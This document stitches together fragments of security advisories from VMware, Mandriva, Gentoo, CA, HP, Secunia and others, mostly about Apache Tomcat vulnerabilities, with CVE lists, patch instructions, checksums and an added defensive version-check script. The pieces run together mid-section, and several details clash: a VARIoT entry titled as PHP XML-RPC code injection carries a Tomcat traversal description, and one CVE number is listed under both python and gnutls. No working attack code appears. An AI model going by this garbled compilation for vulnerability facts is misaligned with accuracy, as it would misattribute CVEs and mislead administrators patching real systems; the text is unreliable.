--- kernel ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3528
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5700
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0028
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0322
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0675
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0676
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0778
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4307
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0834
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0787
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1439
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1633
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1072
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1630
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1192
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5966
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1385
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1389
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1895
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2406
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2407
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0745
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0746
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0747
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0748
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2847
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2848
--- python ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2052
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4965
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2315
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3144
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5031
--- bind ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0696
--- libxml and libxml2 ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2414
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416
--- curl ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2417
--- gnutls ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2052
------------------------------------------------------------------------
6. Change log
2009-11-20 VMSA-2009-0016
Initial security advisory after release of vCenter 4.0 Update 1 and
ESX 4.0 Update 1 on 2009-11-19 and release of vMA Patch 2 on 2009-11-23.
------------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Center
http://www.vmware.com/security
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/lifecycle/
Copyright 2009 VMware Inc. All rights reserved.
Affected Products
=================
The WiKID Strong Authentication Server - Enterprise Edition
The WiKID Strong Authentication Server - Community Edition
References
==========
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5333
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6286
Mitigation
==========
Commercial users may download the most recent RPMs from the website:
http://www.wikidsystems.com/downloads/
Users of the open source community version may download packages from
Sourceforge:
https://sourceforge.net/project/showfiles.php?group_id=144774
--
Nick Owen
WiKID Systems, Inc.
404-962-8983 (desk)
http://www.wikidsystems.com
Two-factor authentication, without the hassle factor.
References
Tomcat release notes
tomcat.apache.org/security-5.html
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
------------------------------------------------------------------------
6.
A cross-site scripting vulnerability was found in the
HttpServletResponse.sendError() method which could allow a remote
attacker to inject arbitrary web script or HTML via forged HTTP headers
(CVE-2008-1232).
A cross-site scripting vulnerability was found in the host manager
application that could allow a remote attacker to inject arbitrary
web script or HTML via the hostname parameter (CVE-2008-1947).
A traversal vulnerability was found when the 'allowLinking' and
'URIencoding' settings were activated which could allow a remote attacker
to use a UTF-8-encoded request to extend their privileges and obtain
local files accessible to the Tomcat process (CVE-2008-2938).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
Mandriva Linux 2008.0/X86_64:
Mandriva Linux 2008.1:
Mandriva Linux 2008.1/X86_64:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
HP has updated the Apache Tomcat and Oracle database software to
address vulnerabilities affecting confidentiality, availability, and
integrity. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
----------------------------------------------------------------------
TITLE:
phpPgAds XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15884
VERIFY ADVISORY:
http://secunia.com/advisories/15884/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
phpPgAds 2.x
http://secunia.com/product/4577/
DESCRIPTION:
A vulnerability has been reported in phpPgAds, which can be exploited
by malicious people to compromise a vulnerable system.
http://sourceforge.net/project/showfiles.php?group_id=36679
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
VAR-200703-0007 | CVE-2007-0450 |
Multiple PHP XML-RPC implementations vulnerable to code injection
Related entries in the VARIoT exploits database: VAR-E-200703-0008, VAR-E-200703-0006, VAR-E-200703-0005, VAR-E-200703-0007, VAR-E-200703-0002, VAR-E-200703-0001, VAR-E-200703-0003, VAR-E-200703-0004 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.

A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system.

Apache HTTP servers running with the Tomcat servlet container are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.
Exploiting this issue allows attackers to access arbitrary files in the Tomcat webroot. This can expose sensitive information that could help the attacker launch further attacks.
Versions in the 5.0 series prior to 5.5.22 and in the 6.0 series prior to 6.0.10 are vulnerable. Note that this vulnerability can only be exploited when using
Apache proxy modules like mod_proxy, mod_rewrite or mod_jk.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Tomcat users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-servers/tomcat-5.5.22"
References
==========
[ 1 ] CVE-2007-0450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200705-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Title: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities
CA Advisory Reference: CA20090123-01
CA Advisory Date: 2009-01-23
Reported By: n/a
Impact: Refer to the CVE identifiers for details.
Summary: Multiple security risks exist in Apache Tomcat as
included with CA Cohesion Application Configuration Manager. CA
has issued an update to address the vulnerabilities. Refer to the
References section for the full list of resolved issues by CVE
identifier.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a Medium risk rating.
Affected Products:
CA Cohesion Application Configuration Manager 4.5
Non-Affected Products
CA Cohesion Application Configuration Manager 4.5 SP1
Affected Platforms:
Windows
Status and Recommendation:
CA has issued the following update to address the vulnerabilities.
CA Cohesion Application Configuration Manager 4.5:
RO04648
https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search&searchID=RO04648
How to determine if you are affected:
1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the
"C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is
vulnerable.
Workaround: None
References (URLs may wrap):
CA Support:
http://support.ca.com/
CA20090123-01: Security Notice for Cohesion Tomcat
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197540
Solution Document Reference APARs:
RO04648
CA Security Response Blog posting:
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/23.aspx
Reported By:
n/a
CVE References:
CVE-2005-2090
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090
CVE-2005-3510
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3510
CVE-2006-3835
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3835
CVE-2006-7195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7195
CVE-2006-7196
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7196
CVE-2007-0450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
CVE-2007-1355
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1355
CVE-2007-1358
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1358
CVE-2007-1858
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1858
CVE-2007-2449
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2449
CVE-2007-2450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2450
CVE-2007-3382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382
CVE-2007-3385 *
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385
CVE-2007-3386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3386
CVE-2008-0128
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128
*Note: the issue was not completely fixed by Tomcat maintainers.
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
v1.1 - Updated Impact, Summary, Affected Products
Customers who require additional information should contact CA
Technical Support at http://support.ca.com.
For technical questions or comments related to this advisory,
please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards,
Ken Williams, Director ; 0xE2941985
CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2009 CA. All rights reserved.
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01178795
Version: 1
HPSBUX02262 SSRT071447 rev. 1 - HP-UX running Apache, Remote Arbitrary Code Execution, Cross Site Scripting (XSS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2007-10-02
Last Updated: 2007-10-02
Potential Security Impact: Remote arbitrary code execution, cross site scripting (XSS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with Apache running on HP-UX. The vulnerabilities could be exploited remotely via Cross Site Scripting (XSS) to execute arbitrary code.
References: CVE-2005-2090, CVE-2006-5752, CVE-2007-0450, CVE-2007-0774, CVE-2007-1355, CVE-2007-1358, CVE-2007-1860, CVE-2007-1863, CVE-2007-1887, CVE-2007-1900, CVE-2007-2449, CVE-2007-2450, CVE-2007-2756, CVE-2007-2872, CVE-2007-3382, CVE-2007-3385, CVE-2007-3386.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running Apache
BACKGROUND
To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed.
AFFECTED VERSIONS
For IPv4:
HP-UX B.11.11
=============
hpuxwsAPACHE
action: install revision A.2.0.59.00 or subsequent
restart Apache
URL: https://www.hp.com/go/softwaredepot/
For IPv6:
HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
=============
hpuxwsAPACHE,revision=B.1.0.00.01
hpuxwsAPACHE,revision=B.1.0.07.01
hpuxwsAPACHE,revision=B.1.0.08.01
hpuxwsAPACHE,revision=B.1.0.09.01
hpuxwsAPACHE,revision=B.1.0.10.01
hpuxwsAPACHE,revision=B.2.0.48.00
hpuxwsAPACHE,revision=B.2.0.49.00
hpuxwsAPACHE,revision=B.2.0.50.00
hpuxwsAPACHE,revision=B.2.0.51.00
hpuxwsAPACHE,revision=B.2.0.52.00
hpuxwsAPACHE,revision=B.2.0.53.00
hpuxwsAPACHE,revision=B.2.0.54.00
hpuxwsAPACHE,revision=B.2.0.55.00
hpuxwsAPACHE,revision=B.2.0.56.00
hpuxwsAPACHE,revision=B.2.0.58.00
hpuxwsAPACHE,revision=B.2.0.58.01
action: install revision B.2.0.59.00 or subsequent
restart Apache
URL: https://www.hp.com/go/softwaredepot/
END AFFECTED VERSIONS
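The BACKGROUND section tells the administrator to search "swlist -a revision -l fileset" output for an affected fileset and then check whether the fixed revision is installed. The shell script below is an added example that automates that check; it is not part of the HP bulletin. The swlist sample lines and the fileset names in them (hpuxwsAPACHE.APACHE and so on) are constructed and may differ on a real system, and the script assumes a POSIX shell with awk and grep. Only the revision numbers for hpuxwsAPACHE and the fixed revision 2.0.59.00 are taken from the bulletin; the leading product letter (A for the IPv4 depot, B for the IPv6 depot) is ignored because both fixed depots carry the same numeric revision.

```shell
#!/bin/sh
# Added example, not from the HP bulletin: flag hpuxwsAPACHE filesets whose
# revision is older than the fixed revision named in HPSBUX02262.

# Constructed sample of "swlist -a revision -l fileset" output; fileset
# names are assumed, not taken from a real HP-UX host.
SAMPLE_SWLIST='# Initializing...
# Contacting target "hpux-host"...
  hpuxwsAPACHE.APACHE            B.2.0.58.01
  hpuxwsAPACHE.APACHE2           B.2.0.58.01
  hpuxwsTOMCAT.TOMCAT            B.5.5.23.00
  OS-Core.CORE-SHLIBS            B.11.23'

# rev_cmp REV1 REV2: prints -1, 0 or 1 for REV1 <, = or > REV2.
# The leading product letter (A./B.) is dropped; the remaining dot-separated
# fields are compared numerically so that 2.0.58.01 sorts below 2.0.59.00.
rev_cmp() {
    echo "$1 $2" | awk '{
        a = $1; b = $2
        sub(/^[A-Za-z]\./, "", a); sub(/^[A-Za-z]\./, "", b)
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) { print "-1"; exit }
            if (xi > yi) { print "1"; exit }
        }
        print "0"
    }'
}

# affected_filesets PRODUCT FIXED_REVISION  (reads swlist output on stdin)
# Prints "fileset revision" for every fileset of PRODUCT below FIXED_REVISION.
affected_filesets() {
    product="$1"; fixed="$2"
    grep "^[[:space:]]*${product}\." | while read -r fileset revision _rest; do
        if [ "$(rev_cmp "$revision" "$fixed")" -lt 0 ]; then
            echo "$fileset $revision"
        fi
    done
}

# Number of hpuxwsAPACHE filesets in the constructed sample that still need
# the update (both APACHE filesets at B.2.0.58.01).
sample_affected_count() {
    printf '%s\n' "$SAMPLE_SWLIST" | affected_filesets hpuxwsAPACHE B.2.0.59.00 | wc -l | tr -d ' '
}

# Stand-alone run over the constructed sample. On a live host, replace the
# printf with:  swlist -a revision -l fileset | affected_filesets hpuxwsAPACHE B.2.0.59.00
printf '%s\n' "$SAMPLE_SWLIST" | affected_filesets hpuxwsAPACHE B.2.0.59.00
```

An empty result means no hpuxwsAPACHE fileset is below the fixed revision; any line printed names a fileset that still needs the depot update and an Apache restart as described under AFFECTED VERSIONS.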
RESOLUTION
HP has made the following available to resolve the vulnerability.
HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent.
The update is available on https://www.hp.com/go/softwaredepot/
Note: HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin contains HP-UX Apache-based Web Server v.2.0.59.00.
MANUAL ACTIONS: Yes - Update
Install HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant:
HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically.
For more information see: https://www.hp.com/go/swa
HISTORY
Revision: 1 (rev.1) - 02 October 2007 Initial release
Third Party Security Patches:
Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact the normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
©Copyright 2007 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBRwVCruAfOvwtKn1ZEQK1YgCfavU7x1Hs59uLdP26lpZFwMxKofIAn3gJ
HHoe3AY1sc6hrW3Xk+B1hcbr
=+E1W
-----END PGP SIGNATURE-----
Multiple cross-site scripting vulnerabilities in the Manager and Host
Manager web applications allow remote authenticated users to inject
arbitrary web script or HTML (CVE-2007-2450).
Tomcat treated single quotes as delimiters in cookies, which could
cause sensitive information such as session IDs to be leaked and allow
remote attackers to conduct session hijacking attacks (CVE-2007-3382).
Tomcat did not properly handle the \" character sequence in a cookie
value, which could cause sensitive information such as session IDs
to be leaked and allow remote attackers to conduct session hijacking
attacks (CVE-2007-3385).
A cross-site scripting vulnerability in the Host Manager servlet
allowed remote attackers to inject arbitrary HTML and web script via
crafted attacks (CVE-2007-3386).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2449
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2007.1:
2eaba952d2699868ef76ca11dc7743e2 2007.1/i586/tomcat5-5.5.17-6.2.4.1mdv2007.1.i586.rpm
037b18dda99d06be0b77f35964257902 2007.1/i586/tomcat5-admin-webapps-5.5.17-6.2.4.1mdv2007.1.i586.rpm
d9e6c355370c0e3f9aebc7ba0edd99d5 2007.1/i586/tomcat5-common-lib-5.5.17-6.2.4.1mdv2007.1.i586.rpm
fcb4fa36ea0926a0fbd92d1f9c9d9671 2007.1/i586/tomcat5-jasper-5.5.17-6.2.4.1mdv2007.1.i586.rpm
fedd1a27a4f46d0d793c3ceb21a57246 2007.1/i586/tomcat5-jasper-javadoc-5.5.17-6.2.4.1mdv2007.1.i586.rpm
ab5985c840c14c812b3e72dae54407f0 2007.1/i586/tomcat5-jsp-2.0-api-5.5.17-6.2.4.1mdv2007.1.i586.rpm
6266395d78af5f64ce7a150b9175fab7 2007.1/i586/tomcat5-jsp-2.0-api-javadoc-5.5.17-6.2.4.1mdv2007.1.i586.rpm
08335caaa65e97003aa67d465ce60ae1 2007.1/i586/tomcat5-server-lib-5.5.17-6.2.4.1mdv2007.1.i586.rpm
3a4f5995900419c7354804ae0dc548b6 2007.1/i586/tomcat5-servlet-2.4-api-5.5.17-6.2.4.1mdv2007.1.i586.rpm
0c27ba521cee0d06627f121df3a138c9 2007.1/i586/tomcat5-servlet-2.4-api-javadoc-5.5.17-6.2.4.1mdv2007.1.i586.rpm
07537a59d8549f412dc4c9a783f41177 2007.1/i586/tomcat5-webapps-5.5.17-6.2.4.1mdv2007.1.i586.rpm
b55342a597ab506be934b6a73ed24005 2007.1/SRPMS/tomcat5-5.5.17-6.2.4.1mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64:
aea539336fa58a995ae1411fe61934c2 2007.1/x86_64/tomcat5-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
0225750a0d4ef032915783d0b29c1504 2007.1/x86_64/tomcat5-admin-webapps-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
8223d038509a71f537f537909e9ef863 2007.1/x86_64/tomcat5-common-lib-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
dedd59d873c5bb4e608b1328595f2d98 2007.1/x86_64/tomcat5-jasper-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
c0ef0eda05488b8b571e6700a9365ea3 2007.1/x86_64/tomcat5-jasper-javadoc-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
95dae961b82630d633fc3419383dbe4b 2007.1/x86_64/tomcat5-jsp-2.0-api-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
41378a0106da001d545681c185b2f5c3 2007.1/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
5448b57b7667414c12aabb1da5e528fa 2007.1/x86_64/tomcat5-server-lib-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
9a277ae64587b81f61e8c118ba4d4571 2007.1/x86_64/tomcat5-servlet-2.4-api-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
1be4b0eea59741ef7efb0f51f97e19c7 2007.1/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
d3965a643dbdc8e685ff4b5861877254 2007.1/x86_64/tomcat5-webapps-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
b55342a597ab506be934b6a73ed24005 2007.1/SRPMS/tomcat5-5.5.17-6.2.4.1mdv2007.1.src.rpm
Mandriva Linux 2008.0:
828e35db12f9dab3a5e63c475c289f88 2008.0/i586/tomcat5-5.5.23-9.2.10.1mdv2008.0.i586.rpm
5e98b01f16f8213db5e842dcb47e4e8b 2008.0/i586/tomcat5-admin-webapps-5.5.23-9.2.10.1mdv2008.0.i586.rpm
fd483503d3f313775be4c098858a4e0d 2008.0/i586/tomcat5-common-lib-5.5.23-9.2.10.1mdv2008.0.i586.rpm
23dffdf05e1c50d5cfea045552c8f3bb 2008.0/i586/tomcat5-jasper-5.5.23-9.2.10.1mdv2008.0.i586.rpm
3da9fcc0e4c0c8366b676e0770b8fe7c 2008.0/i586/tomcat5-jasper-javadoc-5.5.23-9.2.10.1mdv2008.0.i586.rpm
03222fbcf7fad63aa6920d5d4ee55ee2 2008.0/i586/tomcat5-jsp-2.0-api-5.5.23-9.2.10.1mdv2008.0.i586.rpm
566362e78e6dd5f853b616204453aa0d 2008.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.1mdv2008.0.i586.rpm
fd00fd2a4faa567523ba9ce959ad1efa 2008.0/i586/tomcat5-server-lib-5.5.23-9.2.10.1mdv2008.0.i586.rpm
8a8c1b69636876ac31b0968edce82d3f 2008.0/i586/tomcat5-servlet-2.4-api-5.5.23-9.2.10.1mdv2008.0.i586.rpm
85d0641840725e728f18cc86925d1923 2008.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.1mdv2008.0.i586.rpm
3e62b31a3fce47b8d7e2de2ecc7eb29d 2008.0/i586/tomcat5-webapps-5.5.23-9.2.10.1mdv2008.0.i586.rpm
9522ebba28176adf03d9a7b33fb526f8 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
a44ed55a6a2943e5ba39ea6473a2af27 2008.0/x86_64/tomcat5-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
292e2c0a822a736fe85c498c17bb09c6 2008.0/x86_64/tomcat5-admin-webapps-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
c8ee3862233f323278d0b97a3f07a74d 2008.0/x86_64/tomcat5-common-lib-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
